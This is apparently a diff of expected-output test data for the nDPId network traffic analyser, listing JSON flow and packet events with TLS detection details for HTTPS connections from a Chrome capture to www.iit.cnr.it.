-00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902507870,"flow_last_seen":1620902507870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902507870,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620902507870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902507870,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuJAbsdWbUDAAAAALAC\/\/8TEgAAAgQFtAEDAwUBAQgKM3SSOAAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620902507899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902507899,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4lEvFS6HVm1BKAS\/og8HwAAAgQFrAQCCAo6mxVSM3SSOAEDAwc="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620902507899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902507899,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuJAbsdWbUERLxUu4AQECxZJAAAAQEICjN0klQ6mxVS"} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902508740,"flow_last_seen":1620902508740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902508740,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620902508740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902508740,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuKAbtgbcSnAAAAALAC\/\/+8\/wAAAgQFtAEDAwUBAQgKM3SVkQAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620902508769,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902508769,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4peZebaYG3EqKAS\/og23AAAAgQFrAQCCAo6mxi5M3SVkQEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620902508769,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902508769,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuKAbtgbcSoXmXm24AQECxT5gAAAQEICjN0lag6mxi5"} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509272,"flow_last_seen":1620902509272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509272,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620902509272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509272,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuYAbvjd2YSAAAAALAC\/\/+WlQAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509273,"flow_last_seen":1620902509273,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509273,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620902509273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509273,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuZAbt3hYKuAAAAALAC\/\/\/l6gAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509274,"flow_last_seen":1620902509274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509274,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620902509274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuaAbt39JnFAAAAALAC\/\/\/OYgAAAgQFtAEDAwUBAQgKM3SXeQAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509276,"flow_last_seen":1620902509276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509276,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620902509276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509276,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvubAbvm4fjEAAAAALAC\/\/8AcwAAAgQFtAEDAwUBAQgKM3SXewAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5l1X2J5d4WCr6AS\/ojLGgAAAgQFrAQCCAo6mxrNM3SXeAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuZAbt3hYKvdV9ieoAQECzoIAAAAQEICjN0l5M6mxrN"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5gJQMJ043dmE6AS\/oiH6wAAAgQFrAQCCAo6mxrLM3SXeAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuYAbvjd2YTCUDCdYAQECyk8QAAAQEICjN0l5M6mxrL"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5p\/iAsOd\/SZxqAS\/ogA1gAAAgQFrAQCCAo6mxrMM3SXeQEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuaAbt39JnGf4gLD4AQECwd3QAAAQEICjN0l5M6mxrM"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509303,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5sh1fPg5uH4xaAS\/oinwwAAAgQFrAQCCAo6mxrPM3SXewEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509303,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvubAbvm4fjFIdXz4YAQECzEywAAAQEICjN0l5Q6mxrP"} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 